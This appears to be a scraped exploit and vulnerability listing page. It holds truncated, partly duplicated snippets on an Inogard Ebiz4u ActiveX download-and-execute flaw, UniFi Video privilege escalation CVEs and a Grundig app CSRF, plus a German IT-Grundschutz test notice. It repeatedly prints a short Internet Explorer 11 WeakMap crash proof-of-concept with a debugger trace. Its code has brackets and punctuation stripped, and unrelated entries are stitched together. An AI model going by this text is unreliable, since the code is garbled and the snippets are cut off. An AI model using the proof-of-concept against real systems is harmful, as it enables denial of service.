Design/Logic Flaw

AxECM.cabActiveX Control in Inogard Ebiz4u contains a vulnerability that could allow remote files to be downloaded and executed by setting arguments to the activeX method. Download of Code Without Integrity Check vulnerability in ActiveX control of Inogard Co,,LTD Ebiz4u ActiveX of Inogard...

CVE-2020-8145

The UniFi Video Server Windows web interface configuration restore functionality at the “backup” and “wizard” endpoints does not implement sufficient privilege checks. Low privileged users, belonging to the PUBLICGROUP or CUSTOMGROUP groups, can access these endpoints and overwrite the current...

CVE-2020-8146

In UniFi Video v3.10.1 for Windows 7/8/10 x64 there is a Local Privileges Escalation to SYSTEM from arbitrary file deletion and DLL hijack vulnerabilities. The issue was fixed by adjusting the .tsExport folder when the controller is running on Windows and adjusting the SafeDllSearchMode in the...

CVE-2020-8145

The UniFi Video Server Windows web interface configuration restore functionality at the “backup” and “wizard” endpoints does not implement sufficient privilege checks. Low privileged users, belonging to the PUBLICGROUP or CUSTOMGROUP groups, can access these endpoints and overwrite the current...

Ubiquiti Inc.: UniFi Video v3.10.1 (Windows) Local Privileges Escalation to SYSTEM from arbitrary filedelete and DLL hijack vulnerabilities.

Summary: UniFi Video v3.10.1 for Windows 7/8/10 x64 Local Privileges Escalation to SYSTEM from arbitrary file deletion and DLL hijack vulnerabilities. The issue was fixed by adjusting the .tsExport folder when the controller is running on Windows and adjusting the SafeDllSearchMode in the windows...

Grundig Smart Inter@ctive 3.0 Insecure Direct Object Reference

Exploit Title: Grundig Smart Remote App CSRF Google Dork: Local Vulnerability Date: 06.07.2018 Exploit Author: Ahmethan GALTEKAdegN @inject0r16 Vendor Homepage: https://www.grundig.com/ Software Link: https://play.google.com/store/apps/details?id=arcelik. android.grundig.remote Version: Grundig...

Microsoft Internet Explorer 11 - WeakMap Integer Divide-by-Zero

No description provided by source. !-- Exploit title: Microsoft Internet Explorer 11 - WeakMap Integer divide-by-zero DoS Date: 29.05.2014 Vulnerable version: 11 Tested on: Windows 7/8 Author: Pawel Wylecial http://h0wl.pl @h0wlu -- html script var a = new WeakMap; a.pushnew WeakMap; a1.seta0, a1...

Microsoft Internet Explorer 11 - WeakMap Integer Divide-by-Zero

Exploit for windows platform in category dos / poc var a = new WeakMap; a.pushnew WeakMap; a1.seta0, a1; a0.deletea0; ,1::TryGetValueAndRemove+0x1f: 668756f0 f736 div eax,dword ptr esi ds:002b:04598cc8=00000000 -- 0day.today 2018-01-26...

Microsoft Internet Explorer 11 - WeakMap Integer Divide-by-Zero

var a = new WeakMap; a.pushnew WeakMap; a1.seta0, a1; a0.deletea0; ,1::TryGetValueAndRemove+0x1f: 668756f0 f736 div eax,dword ptr esi ds:002b:04598cc8=00000000 --...

IT-Grundschutz M4.001: Passwortschutz für IT-Systeme

IT-Grundschutz M4.001: Passwortschutz für IT-Systeme. ACHTUNG: Dieser Test wird nicht mehr unterstützt. Er wurde ersetzt durch den entsprechenden Test der nun permanent and die aktuelle EL angepasst wird: OID 1.3.6.1.4.1.25623.1.0.94172 Stand: 13. Ergänzungslieferung 13. EL. Hinweis: Ein Test von...